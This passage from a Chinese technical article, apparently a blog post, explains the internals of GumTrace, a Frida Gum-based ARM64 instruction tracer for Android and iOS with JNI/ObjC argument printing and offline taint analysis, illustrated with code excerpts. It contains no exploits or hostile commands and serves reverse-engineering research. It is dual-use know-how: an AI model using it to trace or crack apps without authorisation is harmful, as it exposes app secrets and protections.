    gum_module_enumerate_dependencies(gum_module, module_dependency_cb, nullptr);
// 记录模块基址和大小
    module_map["base"] = gum_module_range->base_address;
    module_map["size"] = gum_module_range->size;
}

对每个指定模块，GumTrace做三件事：

枚举符号
：遍历模块的符号表，建立地址→函数名的映射（func_maps）。这是后续函数调用识别的基础。
枚举依赖
：递归枚举模块的依赖库符号。这样，当目标模块调用libc的strcmp时，也能正确匹配到符号名。
记录范围
：存储模块的基址和大小，用于快速判断某个PC地址是否属于目标模块。

5.3 模块排除策略

gum_process_enumerate_modules(module_enumerate, nullptr);

在Android上，GumTrace遍历进程的所有模块，将不需要追踪的模块主动排除出Stalker的范围：

if (strncmp(module_path, "/system/", 8) == 0 ||
strncmp(module_path, "/apex/", 6) == 0 ||
strncmp(module_path, "/vendor/", 8) == 0 ||
strstr(module_path, "libGumTrace.so") != nullptr ||
strstr(module_path, ".odex") != nullptr ||
strstr(module_path, "memfd") != nullptr) {
    gum_stalker_exclude(instance->_stalker, gum_module_range);
}

被排除的模块执行时不会经过Stalker的JIT引擎，直接以原生速度运行。这是GumTrace高性能的关键之一——只对目标模块插桩，系统库全部放行。

在iOS上采用更简洁的相反策略：只对指定模块不排除，其余全部排除。

5.4 JNI环境获取（Android）

auto libart_module = gum_process_find_module_by_name("libart.so");
GumAddress JNI_GetCreatedJavaVMs_addr =
    gum_module_find_symbol_by_name(libart_module, "JNI_GetCreatedJavaVMs");
// ... 多重查找策略 ...
auto *jni_get_created_vms =
    reinterpret_cast(JNI_GetCreatedJavaVMs_addr);
jint result = jni_get_created_vms(vms, vm_count, &vm_count);
if (result == JNI_OK && vm_count > 0) {
    instance->java_vm = vms[0];
}

为了支持JNI函数追踪，GumTrace在初始化时从libart.so获取JNI_GetCreatedJavaVMs的地址。查找策略有三层回退：先查符号表，再查导出表，最后查全局导出。获取JavaVM后，后续可以通过GetEnv获得JNIEnv指针，进而解析JNI字符串、类名等对象。

5.5 系统调用表初始化

for (constauto& svc_name : svc_names) {
auto svc_name_vector = Utils::str_split(svc_name, ' ');
    instance->svc_func_maps[std::stoi(svc_name_vector.at(1))] = svc_name_vector.at(0);
}

GumTrace内置了完整的Linux aarch64系统调用表（定义在Utils.cpp中），在初始化时将系统调用号→函数名的映射加载到svc_func_maps中。当追踪到SVC指令时，通过x8寄存器的值查表即可获得系统调用名。

6 Stalker插桩引擎

插桩引擎是GumTrace的心脏，它决定了"在哪里插桩"和"插桩时做什么"。

6.1 Transform回调

当Stalker需要编译一个新的代码块时，会调用transform_callback：

voidGumTrace::transform_callback(GumStalkerIterator *iterator,
                                   GumStalkerOutput *output,
                                   gpointer user_data){
constauto self = get_instance();
    cs_insn *p_insn;
auto *it = iterator;
while (gum_stalker_iterator_next(it, (const cs_insn **) &p_insn)) {
const std::string *module_name_ptr = self->in_range_module(p_insn->address);
if (module_name_ptr == nullptr) {
gum_stalker_iterator_keep(it);
continue;
        }
if (Utils::is_lse(p_insn) == false) {
auto callback_ctx = self->callback_context_instance->pull(
                p_insn, gum_stalker_iterator_get_capstone(it),
                module_name_ptr->c_str(), module.at("base"));
gum_stalker_iterator_put_callout(it, callout_callback,
                                              callback_ctx, nullptr);
        }
gum_stalker_iterator_keep(it);
    }
}

这段代码的执行流程：

逐条迭代
：Stalker将目标代码块的每条ARM64指令通过Capstone反汇编后交给迭代器。
模块过滤
：通过in_range_module检查指令地址是否属于目标模块。不属于的指令直接keep（保留原样）。
原子指令跳过
：LSE（Large System Extensions）原子指令和独占加载/存储指令不能被插桩，否则会破坏原子性导致死锁。
插入callout
：对需要追踪的指令，通过gum_stalker_iterator_put_callout在其前方插入一个回调点。

6.2 模块查找优化

in_range_module使用了一层缓存来加速查找：

const std::string *GumTrace::in_range_module(size_t address){
// 缓存命中——连续指令几乎必然在同一模块
if (last_module_cache.name != nullptr &&
        address >= last_module_cache.base &&
        address < last_module_cache.end) {
return last_module_cache.name;
    }
// 遍历所有模块
for (constauto &pair: modules) {
constauto &module_map = pair.second;
size_t base = module_map.at("base");
size_t size = module_map.at("size");
size_t end = base + size;
if (address >= base && address < end) {
            last_module_cache = {&pair.first, base, end};
return &pair.first;
        }
    }
returnnullptr;
}

由于代码的空间局部性，连续执行的指令几乎总是在同一个模块中。CachedModule缓存使得绝大多数查找只需一次比较即可完成。

6.3 原子指令检测

staticboolis_lse(cs_insn *insn);
staticboolis_exclusive_load(cs_insn *insn);

ARM64的原子操作指令包括两类：

LSE原子指令
：ldadd, ldclr, ldset, ldeor, swp, cas等，以及它们的各种宽度变体（b/h/l/al）。
独占加载/存储
：ldxr/stxr、ldaxr/stlxr等成对使用的指令。

这些指令依赖硬件的原子性保证来正确工作。如果在它们之间插入callout回调，会破坏独占监视器（exclusive monitor）的状态，导致无限重试或死锁。GumTrace在transform阶段识别并跳过这些指令，是保障稳定性的关键措施。

7 Callout回调：指令级记录

callout_callback是每条指令执行前调用的核心函数，它完成寄存器值读取、内存地址计算和日志写入。源码位于src/GumTrace.cpp。

7.1 缓冲区管理

char *buff = self->buffer;
int &buff_n = self->buffer_offset;
if (buff_n > BUFFER_SIZE - 1024) {
    self->trace_file.write(buff, buff_n);
    buff_n = 0;
}

GumTrace使用一个50MB的内存缓冲区（BUFFER_SIZE = 1024 * 1024 * 50）来减少文件I/O次数。所有的日志内容先写入缓冲区，当剩余空间不足1KB时才一次性刷写到文件。这种批量写入策略极大地降低了系统调用的开销。

7.2 写回寄存器处理

if (self->write_reg_list.num > 0) {
for (int i = 0; i < self->write_reg_list.num; i++) {
__uint128_t reg_value = 0;
if (Utils::get_register_value(self->write_reg_list.regs[i],
                                       cpu_context, reg_value)) {
if (i == 0) Utils::append_string(buff, buff_n, "-> ");
// 写入寄存器名和值
        }
    }
    Utils::append_char(buff, buff_n, '\n');
    self->write_reg_list.num = 0;
}

这段代码利用了一个精妙的时序差：当前指令的callout执行时，前一条指令已经执行完毕。因此可以在当前callout中读取前一条指令的写目标寄存器值。write_reg_list记录了前一条指令的写目标寄存器列表，在当前callout中读取这些寄存器的当前值，就是前一条指令的执行结果。

7.3 操作数解析与内存地址计算

callout回调的核心是一个对Capstone反汇编结果的多分支遍历，根据操作数的访问类型（CS_AC_READ/CS_AC_WRITE）和类型（ARM64_OP_REG/ARM64_OP_MEM）分别处理：

for (int i = 0; i < callback_ctx->instruction_detail.arm64.op_count; i++) {
    cs_arm64_op &op = callback_ctx->instruction_detail.arm64.operands[i];
if ((op.access & CS_AC_READ) && op.type == ARM64_OP_REG) {
// 读寄存器：记录当前值
    }
elseif ((op.access & CS_AC_WRITE) && op.type == ARM64_OP_MEM) {
// 写内存：计算 base + (index << shift) + disp
uintptr_t shifted_index = Utils::apply_shift(index, op.shift.type,
                                                      op.shift.value);
uintptr_t write_address = base + shifted_index + op.mem.disp;
// 记录 mem_w=地址
    }
elseif ((op.access & CS_AC_READ) && op.type == ARM64_OP_MEM) {
// 读内存：同样计算有效地址
// 记录 mem_r=地址
    }
elseif ((op.access & CS_AC_WRITE) && op.type == ARM64_OP_REG) {
// 写寄存器：加入 write_reg_list，下一条指令的callout读取
    }
}

内存地址的计算覆盖了ARM64复杂的寻址模式：base + (index << shift) + displacement。对于后索引（[base], #imm）和预索引（[base, #imm]!）模式，基址寄存器本身也会被更新，因此同时加入写回列表。

7.4 移位计算

ARM64支持多种移位类型，GumTrace通过apply_shift函数完整覆盖：

staticinlineuintptr_tapply_shift(__uint128_t value,
                                     arm64_shifter type,
unsignedint amount){
uintptr_t val = (uintptr_t)value;
switch (type) {
case ARM64_SFT_LSL: return val << amount;
case ARM64_SFT_LSR: return val >> amount;
case ARM64_SFT_ASR: return (uintptr_t)((intptr_t)val >> amount);
case ARM64_SFT_ROR: return (val >> amount) | (val << (64 - amount));
case ARM64_SFT_MSL: return (val << amount) | ((1ULL << amount) - 1);
default: return val;
    }
}

其中MSL（Masked Shift Left）较为少见，它在左移后将低位全部填1，常见于SIMD指令的立即数编码。

8 CallbackContext：对象池设计

每条指令的callout需要一个上下文对象来存储反汇编结果。频繁的malloc/free会严重拖慢性能。GumTrace使用环形对象池解决这个问题。

8.1 预分配策略

#define CALLBACK_CTX_SIZE 102400
CallbackContext::CallbackContext() {
    list = (CALLBACK_CTX*)calloc(CALLBACK_CTX_SIZE, sizeof(CALLBACK_CTX));
}

在初始化时一次性分配102400个CALLBACK_CTX对象。每个对象包含完整的Capstone反汇编结果（cs_insn、cs_detail），以及模块名和基址。

8.2 环形复用

CALLBACK_CTX* CallbackContext::pull(const cs_insn* _instruction, csh _handle,
constchar* module_name,
uint64_t module_base){
if (curr_index >= CALLBACK_CTX_SIZE) {
        curr_index = 0;  // 回绕
    }
    CALLBACK_CTX *ctx = &list[curr_index++];
    ctx->handle = _handle;
    ctx->module_name = module_name;
    ctx->module_base = module_base;
memcpy(&ctx->instruction, _instruction, sizeof(cs_insn));
if (_instruction->detail) {
memcpy(&ctx->instruction_detail, _instruction->detail, sizeof(cs_detail));
    }
return ctx;
}

pull从池中取出下一个槽位，用memcpy填充反汇编数据。当索引到达末尾时回绕到0。这个设计的前提是：Stalker编译代码块时分配的callout上下文，在代码块被废弃前不会被覆盖。102400个槽位足够覆盖Stalker的工作窗口。

整个对象池零堆分配，全部操作都是数组索引和memcpy，这是追踪引擎保持高吞吐的基石之一。

9 函数调用识别

GumTrace不只是记录指令，还能自动识别函数调用并打印参数和返回值。这一功能由FuncPrinter类实现。

9.1 跳转目标解析

在callout_callback中，GumTrace检测四种跳转指令：

if (callback_ctx->instruction.id == ARM64_INS_BL &&
    callback_ctx->instruction_detail.arm64.operands[0].type == ARM64_OP_IMM) {
    jump_addr = callback_ctx->instruction_detail.arm64.operands[0].imm;
}
elseif (callback_ctx->instruction.id == ARM64_INS_BLR &&
         operands[0].type == ARM64_OP_REG) {
    Utils::get_register_value(operands[0].reg, cpu_context, jump_addr);
}
elseif (callback_ctx->instruction.id == ARM64_INS_BR && ...) { ... }
elseif (callback_ctx->instruction.id == ARM64_INS_B && ...) { ... }

BL
：直接调用，立即数操作数就是目标地址。
BLR
：间接调用，从寄存器读取目标地址（常见于虚函数调用、函数指针调用）。
BR
：间接跳转，同样从寄存器读取地址（常见于尾调用优化和跳转表）。
B
：直接跳转，在尾调用场景下等效于函数调用。

获取到jump_addr后，在func_maps中查找匹配的符号名。匹配成功则触发参数打印。

9.2 配置驱动的参数打印

GumTrace使用声明式配置来描述每个已知函数的参数格式：

const std::unordered_map func_configs = {
// 字符串操作
    {"strcmp", {PARAMS_NUMBER_TWO, {STR_INDEX_ZERO, STR_INDEX_ONE}, {}}},
    {"strlen", {PARAMS_NUMBER_ONE, {STR_INDEX_ZERO}, {}}},
// 内存操作
    {"memcpy", {PARAMS_NUMBER_THREE, {}, {{HEX_INDEX_ONE, HEX_INDEX_TWO}}}},
    {"memcmp", {PARAMS_NUMBER_THREE, {},
        {{HEX_INDEX_ZERO, HEX_INDEX_TWO}, {HEX_INDEX_ONE, HEX_INDEX_TWO}}}},
// 文件操作
    {"open", {PARAMS_NUMBER_TWO, {STR_INDEX_ZERO}, {}}},
    {"read", {PARAMS_NUMBER_THREE, {}, {{HEX_INDEX_ONE, HEX_INDEX_TWO}}}},
// 动态链接
    {"dlopen", {PARAMS_NUMBER_TWO, {STR_INDEX_ZERO}, {}}},
    {"dlsym",  {PARAMS_NUMBER_TWO, {STR_INDEX_ONE}, {}}},
// ...
};

BeforeFuncConfig结构体包含：

params_number
：参数个数，决定打印x0到x(n-1)的值。
string_indices
：哪些参数是字符串，需要读取内存内容。
hexdump_indices
：哪些参数对需要hexdump，格式为{地址寄存器索引, 长度寄存器索引}。
special_handler
：特殊处理函数，如syscall需要二次解析。

这种配置驱动的设计使得添加新函数的支持只需一行配置，无需修改打印逻辑。

9.3 内置函数识别范围

GumTrace内置了对以下类别函数的自动解析：

类别	函数
字符串操作	`strlen` , `strcmp`, `strncmp`, `strcpy`, `strcat`, `strstr`, `strdup`, `strlcpy`, `strlcat`等
内存操作	`memcpy` , `memmove`, `memset`, `memcmp`, `memmem`, `memchr`等
文件操作	`open` , `openat`, `read`, `write`, `fopen`, `close`, `pread64`, `pwrite64`等
内存分配	`malloc` , `calloc`, `realloc`, `free`, `aligned_alloc`
内存映射	`mmap` , `mmap64`, `mprotect`
动态链接	`dlopen` , `dlsym`, `dlclose`
格式化	`sprintf` , `snprintf`, `sscanf`, `fgets`及其`__chk`安全变体
系统	`syscall` , `__system_property_get`, `sysconf`, `gettimeofday`
JNI (Android)	全部JNI函数——`FindClass`, `GetMethodID`, `CallObjectMethod`, `GetStringUTFChars`等
ObjC (iOS)	`objc_msgSend` , `objc_retain`, `objc_release`, `NSClassFromString`, `CC_SHA256`等

值得注意的是，对于__memcpy_aarch64_simd、__strncmp_aarch64等架构特定的优化变体，GumTrace同样能正确识别。

9.4 返回值捕获

函数的返回值不能在调用前获取，需要等到下一条指令的callout中读取x0。GumTrace通过last_func_context实现这种跨指令的状态传递：

// 调用前：记录函数信息，设置 call = true
self->last_func_context.name = func_maps[jump_addr].c_str();
memcpy(&self->last_func_context.cpu_context, cpu_context, sizeof(GumCpuContext));
self->last_func_context.call = true;
FuncPrinter::before(&self->last_func_context);
// 下一条指令的 callout 中：
if (self->last_func_context.call) {
    self->last_func_context.call = false;
    FuncPrinter::after(&self->last_func_context, cpu_context);
// 写入返回值信息
}

before在调用发生时打印函数名和参数，after在调用返回后打印返回值（x0）。对于JNI函数，after还会额外解析JNI对象的内容。

10 Android JNI追踪

对于Android逆向来说，JNI函数的追踪能力是GumTrace的一大亮点。

10.1 JNI函数表解析

在获取到JNIEnv指针后，GumTrace遍历JNI函数表建立地址→函数名的映射：

auto jni_func_table = (uint64_t)jni_env->functions;
int index = 0;
for (constauto &func_name: jni_func_names) {
auto func_addr_ptr = (void **)(jni_func_table + index * sizeof(void *));
auto func_addr = (uint64_t)(*func_addr_ptr);
    jni_func_maps[func_addr] = func_name;
    index++;
}

jni_func_names数组包含了所有JNI接口函数的名称（按JNI函数表的顺序排列）。通过指针算术直接从函数表中读取每个函数的实际地址。

10.2 类名和方法名缓存

当追踪到FindClass或GetMethodID调用时，GumTrace缓存返回的jclass和jmethodID与名称的对应关系：

if (strcmp(func_context->name, "FindClass") == 0) {
char jclass_name[1024] = {0};
int jclass_name_n = 0;
read_string(jclass_name_n, jclass_name,
                (char*)func_context->cpu_context.x[1]);
    instance->jni_classes[curr_cpu_context->x[0]] = jclass_name;
}

后续当CallObjectMethod等函数被调用时，可以通过x1（jclass）和x2（jmethodID）查缓存，直接打印出Java类名和方法名，而不是难以理解的原始指针值。

10.3 JNI字符串解析

对于涉及JNI字符串的函数，GumTrace直接调用JNI API读取字符串内容：

auto jstr = (jstring)(func_context->cpu_context.x[reg_index]);
constchar *cstr = instance->jni_env->GetStringUTFChars(jstr, nullptr);
// 写入日志
instance->jni_env->ReleaseStringUTFChars(jstr, cstr);

这种做法虽然简单直接，但需要注意调用时机——必须在JNI环境有效时执行，否则会导致崩溃。

11 iOS ObjC追踪

iOS平台的GumTrace额外支持Objective-C消息的深度解析。

11.1 objc_msgSend拦截

ObjC的所有方法调用最终都通过objc_msgSend分发。GumTrace拦截这个函数后，解析其两个固定参数：

if (func_name_str == "objc_msgSend") {
uint64_t selector_ptr = func_context->cpu_context.x[1];
constchar *selector_name = sel_getName((SEL)selector_ptr);
    id target = (id)func_context->cpu_context.x[0];
constchar* gotClassName = get_class_name(target);
// 格式化为 [ClassName selectorName]
}

x0
：接收者对象（self）
x1
：selector（方法选择器）

通过ObjC运行时API sel_getName和object_getClassName获取可读的类名和方法名。

11.2 ObjC对象序列化

GumTrace能够将常见的ObjC对象类型序列化为可读格式：

voidFuncPrinter::print_ios_object(int& buff_n, char* buff, id obj,
int indent_level){
if (obj == nil) { /* null */ }
constchar *class_name = object_getClassName(obj);
if (strstr(class_name, "Dictionary"))
print_ios_dictionary(buff_n, buff, obj, class_name, indent_level);
elseif (strstr(class_name, "Array"))
print_ios_array(buff_n, buff, obj, class_name, indent_level);
elseif (strstr(class_name, "String"))
print_ios_string(buff_n, buff, obj, class_name, indent_level);
elseif (strstr(class_name, "Data"))
print_ios_data(buff_n, buff, obj, class_name, indent_level);
elseif (strstr(class_name, "Number"))
print_ios_number(buff_n, buff, obj, class_name, indent_level);
// ...
}

NSDictionary被展开为缩进的JSON风格结构，键按字母排序；NSArray展开为列表；NSString打印内容（超过1024字符截断）；NSData执行hexdump；NSNumber打印值和类型标注（int/long/double/float/bool）。

递归调用print_ios_object使得嵌套结构（如Dictionary中包含Array）也能正确展开。

12 寄存器值读取

GumTrace通过Capstone的寄存器ID直接索引Gum的CPU上下文结构体来读取寄存器值。

12.1 通用寄存器

boolUtils::get_register_value(arm64_reg reg, _GumArm64CpuContext *ctx,
__uint128_t &value){
// x0-x28 → ctx->x[0..28]
if (reg >= ARM64_REG_X0 && reg <= ARM64_REG_X28) {
        value = ctx->x[reg - ARM64_REG_X0];
returntrue;
    }
// w0-w28 → ctx->x[0..28] 的低32位
if (reg >= ARM64_REG_W0 && reg <= ARM64_REG_W28) {
        value = (uint32_t)ctx->x[reg - ARM64_REG_W0];
returntrue;
    }
// sp, fp(x29), lr(x30), pc, nzcv
// ...
}

12.2 SIMD/浮点寄存器

GumTrace完整支持ARM64的SIMD寄存器系统。q寄存器是128位，d/s/h/b分别是其64/32/16/8位的低位视图：

// q0-q31 → ctx->v[0..31] (128-bit)
if (reg >= ARM64_REG_Q0 && reg <= ARM64_REG_Q31) {
int idx = reg - ARM64_REG_Q0;
memcpy(&value, &ctx->v[idx], sizeof(__uint128_t));
returntrue;
}
// d0-d31 → v[n] 的低 64 位
if (reg >= ARM64_REG_D0 && reg <= ARM64_REG_D31) {
int idx = reg - ARM64_REG_D0;
memcpy(&value, &ctx->v[idx], sizeof(uint64_t));
returntrue;
}

128位值的十六进制格式化通过format_uint128_hex实现，它将__uint128_t拆为高低64位分别输出，跳过前导零以保持日志紧凑。

13 性能工程

GumTrace的设计目标是"每3秒1GB"，为此在多个层面做了性能优化。

13.1 零分配热路径

在callout回调（每条指令执行一次）中，GumTrace完全避免了堆分配：

字符串操作
：全部使用append_string/append_char/append_uint64_hex直接写入预分配缓冲区，不使用std::string或sprintf。
上下文对象
：从预分配的环形池中获取，不调用malloc。
数值格式化
：手写的十六进制转换，逐nibble查表，避免snprintf的重量级实现。

staticinlinevoidappend_uint64_hex(char* buff, int& counter, uint64_t val){
// 手写的零分配十六进制输出，跳过前导零
}

13.2 批量I/O

50MB的内存缓冲区意味着在Standard模式下，文件写入可能每几秒才发生一次。后台线程每20秒执行一次flush：

void* thread_function(void* arg){
while (true) {
        instance->trace_file.flush();
usleep(1000 * 1000 * 20);  // 20秒
    }
}

在DEBUG模式下，flush间隔缩短到1毫秒，并且每20条指令触发一次写入，确保日志实时可见（代价是性能显著下降）。

13.3 Stalker排除

如前所述，将系统模块排除出Stalker范围是最重要的性能优化。未被排除的模块中的每条指令都需要经过JIT重编译和callout调用，而排除的模块以原生速度运行。对于典型场景（追踪一个1MB的目标SO），系统库占进程代码的99%以上，排除它们能带来数量级的性能提升。

14 离线污点分析

GumTrace附带了一个独立的离线污点分析工具，可对trace日志进行数据流追踪。这是整个工具链中分析能力最强的组件。

14.1 设计理念

污点分析不在追踪时实时进行，而是作为离线后处理。这样做有两个好处：

追踪阶段不需要承担分析开销，保持最高的记录速度。
分析时可以反复运行不同的查询，不需要重新追踪。

14.2 日志解析器（TraceParser）

TraceParser将文本日志解析为紧凑的二进制表示，每条指令压缩为约64字节的TraceLine结构：

structTraceLine {
int line_number = 0;
    InsnCategory category = InsnCategory::OTHER;
uint8_t num_dst = 0;
uint8_t num_src = 0;
    RegId dst_regs[4];
    RegId src_regs[8];
uint64_t mem_read_addr = 0;
uint64_t mem_write_addr = 0;
uint64_t mem_write_addr2 = 0;   // STP 第二个写地址
uint64_t mem_read_addr2 = 0;    // LDP 第二个读地址
uint64_t rel_addr = 0;
bool has_mem_read = false;
bool has_mem_write = false;
bool sets_flags = false;        // adds/subs 等隐式写 NZCV
long file_offset = 0;           // 文件偏移，用于回读原始行
int line_len = 0;
};

零分配设计：解析器使用数值化的RegId枚举代替字符串存储寄存器名，使用InsnCategory枚举预分类指令类型。寄存器名解析完全手写，不依赖任何字符串库：

RegId TraceParser::parse_reg_name(constchar* s, int len){
switch (s[0]) {
case'x': case'X':
if (len == 2 && s[1] >= '0' && s[1] <= '9')
return (RegId)(REG_X0 + (s[1] - '0'));
// ...
case'w': case'W':
// w→x 直接归一化
return (RegId)(REG_X0 + n);
    }
}

寄存器归一化确保w0和x0被视为同一实体，fp映射为x29，lr映射为x30，d0/s0/h0/b0都归一化为q0。

14.3 指令分类

解析器将ARM64助记符分为12个类别，使得污点引擎可以按类别处理而非逐指令匹配：

类别	助记符示例	污点行为
DATA_MOVE	mov, mvn, neg	src → dst
IMM_LOAD	movz, movn, adr, adrp	清除dst污点
PARTIAL_MODIFY	movk	保持dst已有污点
ARITHMETIC	add, sub, mul, madd	src任一污染 → dst污染
LOGIC	and, orr, eor, bic	同上
SHIFT_EXT	lsl, lsr, sxtw, uxtb	同上
BITFIELD	ubfm, sbfm, bfi, extr	同上
LOAD	ldr, ldp, ldur	mem → dst
STORE	str, stp, stur	src → mem
COMPARE	cmp, cmn, tst	src → NZCV
COND_SELECT	csel, csinc, csneg	src → dst
BRANCH	b, bl, ret, cbz	无传播

14.4 污点传播引擎（TaintEngine）

污点引擎支持正向和反向两种追踪模式。

正向传播：从初始污点源出发，沿执行顺序追踪数据如何被传播和变换。核心规则：

voidTaintEngine::propagate_forward(const TraceLine& line){
switch (line.category) {
case InsnCategory::DATA_MOVE:
case InsnCategory::ARITHMETIC: {
// 源操作数中有污点 → 目标操作数标记污点
// 源操作数全部干净 → 目标操作数清除污点
boolsrc_t = any_src_tainted(line);
for (int i = 0; i < line.num_dst; i++) {
if (src_t) taint_reg(line.dst_regs[i]);
elseuntaint_reg(line.dst_regs[i]);
            }
// adds/subs 还会隐式传播到 NZCV
if (line.sets_flags) {
if (src_t) taint_reg(REG_NZCV);
elseuntaint_reg(REG_NZCV);
            }
break;
        }
case InsnCategory::LOAD: {
// 内存地址被污染 → 加载到的寄存器标记污点
boolmem_t = line.has_mem_read &&
                         tainted_mem_.count(line.mem_read_addr);
for (int i = 0; i < line.num_dst; i++) {
if (mem_t) taint_reg(line.dst_regs[i]);
elseuntaint_reg(line.dst_regs[i]);
            }
break;
        }
case InsnCategory::STORE: {
// 数据寄存器被污染 → 写入的内存地址标记污点
boolsrc_t = is_reg_tainted(line.src_regs[0]);
if (src_t) tainted_mem_.insert(line.mem_write_addr);
else tainted_mem_.erase(line.mem_write_addr);
break;
        }
case InsnCategory::IMM_LOAD:
// 立即数加载清除目标的污点
for (int i = 0; i < line.num_dst; i++)
untaint_reg(line.dst_regs[i]);
break;
// ...
    }
}

反向传播：从结果出发，逆执行顺序追溯数据的来源。规则与正向互为镜像：

voidTaintEngine::propagate_backward(const TraceLine& line){
switch (line.category) {
case InsnCategory::ARITHMETIC: {
// 目标寄存器被污染 → 源操作数标记污点
if (any_dst_tainted(line)) {
for (int i = 0; i < line.num_dst; i++)
untaint_reg(line.dst_regs[i]);
for (int i = 0; i < line.num_src; i++)
taint_reg(line.src_regs[i]);
            }
break;
        }
case InsnCategory::STORE: {
// 写入的内存地址被污染 → 数据寄存器标记污点
if (tainted_mem_.count(line.mem_write_addr)) {
                tainted_mem_.erase(line.mem_write_addr);
taint_reg(line.src_regs[0]);
            }
break;
        }
// ...
    }
}

LDP/STP双操作：污点引擎特别处理了ARM64的成对加载/存储指令。LDP加载两个寄存器，STP存储两个寄存器，它们的两个操作数分别独立追踪：

case InsnCategory::LOAD: {
if (line.has_mem_read2 && line.num_dst >= 2) {
// LDP: 两个读地址分别对应两个目标寄存器
bool mem_t1 = tainted_mem_.count(line.mem_read_addr);
bool mem_t2 = tainted_mem_.count(line.mem_read_addr2);
if (mem_t1) taint_reg(line.dst_regs[0]);
elseuntaint_reg(line.dst_regs[0]);
if (mem_t2) taint_reg(line.dst_regs[1]);
elseuntaint_reg(line.dst_regs[1]);
    }
}

14.5 污点状态管理

寄存器污点使用256位的布尔数组实现，覆盖所有RegId枚举值。操作是O(1)的：

bool reg_taint_[256] = {};
int tainted_reg_count_ = 0;
inlinevoidtaint_reg(RegId id){
auto nid = TraceParser::normalize(id);
if (!reg_taint_[nid]) { reg_taint_[nid] = true; tainted_reg_count_++; }
}

内存污点使用unordered_set存储，因为被污染的内存地址通常很稀疏。

每次传播事件时，引擎会记录一个包含完整污点快照的ResultEntry，供最终输出使用。

14.6 终止条件

引擎有三种停止条件：

enum classStopReason {
    ALL_TAINT_CLEARED,    // 所有污点被清除
    END_OF_TRACE,         // 到达日志末尾（正向）或开头（反向）
    SCAN_LIMIT_REACHED    // 连续100万行无传播事件
};

SCAN_LIMIT_REACHED防止在长时间无关代码段上浪费计算。默认值100万行可通过set_max_scan_distance调整。

14.7 命令行使用

# 正向追踪：从第100行的x0寄存器开始
./taint_tracker -i trace.log -o result.log -f x0 -l 100
# 反向追踪：从第500行的x0寄存器反向追溯
./taint_tracker -i trace.log -o result.log -b x0 -l 500
# 追踪内存地址
./taint_tracker -i trace.log -o result.log -f mem:0x1000 -l 100
# 按相对地址定位
./taint_tracker -i trace.log -o result.log -f x0 -a 0x1890
# 按字节偏移定位（适合超大日志文件）
./taint_tracker -i trace.log -o result.log -b x0 -p 1048576

反向追踪使用load_range优化——只加载到目标行的数据，避免将整个GB级日志读入内存：

if (mode == TrackMode::BACKWARD && start_line > 0) {
    parser.load_range(input_file, start_line);
} else {
    parser.load(input_file);
}

14.8 010 Editor集成

对于需要交互式分析的场景，GumTrace提供了TaintTracker.1sc脚本，可在010 Editor中直接使用：

在010 Editor中打开trace日志
将光标移到要分析的指令行
运行脚本，选择追踪方向和目标寄存器
脚本自动调用taint_tracker并打开结果文件

脚本通过分析光标所在行自动提取默认的追踪目标（第一个出现的寄存器），并根据光标位置的字节偏移定位起始行，无需手动输入行号。

15 平台适配

GumTrace通过编译时宏实现Android/iOS的平台分离。

15.1 条件编译

// platform.h
#ifdef __APPLE__
#define PLATFORM_IOS 1
#define PLATFORM_ANDROID 0
#else
#define PLATFORM_IOS 0
#define PLATFORM_ANDROID 1
#endif

整个代码库中，#if PLATFORM_ANDROID和#if PLATFORM_IOS控制平台特定的代码路径。核心追踪逻辑（Stalker插桩、操作数解析、缓冲区管理）是完全共享的。

15.2 平台差异对照

维度	Android	iOS
产物	libGumTrace.so	libGumTrace.dylib
日志	`__android_log_print`	`NSLog`
JNI追踪	✅	—
ObjC追踪	—	✅
模块排除	路径前缀匹配	仅保留指定模块
构建工具	NDK CMake工具链	Xcode iphoneos SDK
最低版本	Android API 24	iOS 12.0

15.3 Frida Gum库

GumTrace链接的是Frida Gum的静态库（版本17.8.3），分为Android和iOS两个变体：

libs/
├── FridaGum-Android-17.8.3-fix.a   # Android arm64
├── FridaGum-Android-17.8.3.h       # Android 头文件
├── FridaGum-IOS-17.8.3-fix.a       # iOS arm64
└── FridaGum-IOS-17.8.3.h           # iOS 头文件

文件名中的-fix后缀表明这是经过修改的版本，可能针对特定场景做了补丁。静态链接使得产物是自包含的，不依赖设备上的Frida环境。

16 项目结构

GumTrace/
├── CMakeLists.txt              # 主构建脚本（双平台）
├── build_android.sh            # Android 构建脚本
├── build_ios.sh                # iOS 构建脚本
├── example.js                  # Android Frida 使用示例
├── example_ios.js              # iOS Frida 使用示例
├── libs/                       # Frida Gum 静态库和头文件
└── src/
    ├── main.cpp                # 入口：init/run/unrun 导出函数
    ├── GumTrace.h/cpp          # 核心引擎：Stalker回调、指令解析
    ├── CallbackContext.h/cpp   # 上下文对象池（环形缓冲）
    ├── FuncPrinter.h/cpp       # 函数参数/返回值打印（含JNI和ObjC）
    ├── Utils.h/cpp             # 工具函数：寄存器读取、十六进制格式化
    ├── platform.h              # 平台检测宏
    └── taint/                  # 离线污点分析工具
        ├── CMakeLists.txt
        ├── main.cpp            # 命令行入口
        ├── TraceParser.h/cpp   # 日志解析器（零分配设计）
        ├── TaintEngine.h/cpp   # 污点传播引擎（正向/反向）
        └── TaintTracker.1sc    # 010 Editor 交互式脚本

17 总结

GumTrace是一个将性能和功能推到了ARM64平台trace工具极限的项目。回顾其核心设计决策：

C++ Native引擎替代JavaScript
——绕开Frida的JS层，直接调用Gum C API，获得了数量级的性能提升。
Stalker排除策略
——只对目标模块插桩，系统库原生运行，使得trace速度接近实用水平。
环形对象池 + 50MB缓冲区 + 零分配热路径
——将每条指令的处理开销压到最低。
配置驱动的函数识别
——新函数只需一行配置，无需修改打印逻辑。
离线污点分析
——追踪和分析分离，追踪时只记录，分析时可以反复查询。
双向污点追踪
——正向追踪数据去向，反向追溯数据来源，覆盖安全研究的典型需求。

对于安全研究者而言，GumTrace填补了"函数级Hook太粗、硬件trace太难"之间的空白。它让研究者能够在真机上获取指令级的完整执行轨迹，配合Trace UI可视化工具和离线污点分析，构成了一套完整的ARM64动态分析工具链。

跳转微信打开

软件安全与逆向分析

解决一个安卓15/16调试APK运行adb jdwp无输出的问题

有意思的官方杀同人安卓投屏多窗口融合模式

同人作品AndDrive

scrcpy版本4.0

flex display核心能力

PR 6772的实现关键

同人和官方的位置

三大Root框架通杀检测与反检测方法分析

Duck-Detector检测原理

DirtySepolicy独立PoC

KernelSU运行时过检测

内核源码级过检测补丁

KPM运行时补丁方案

KPM方案的限制

总结

参考资料

iOS虚拟手机可以玩窗口化融合的越狱插件

项目介绍

iOS虚拟手机越狱

安装越狱插件

App窗口化技术

总结

最近是怎么了？又一款通杀全线Linux发行版的0Day漏洞

又一款通杀全线Linux发行版的0Day漏洞

背景

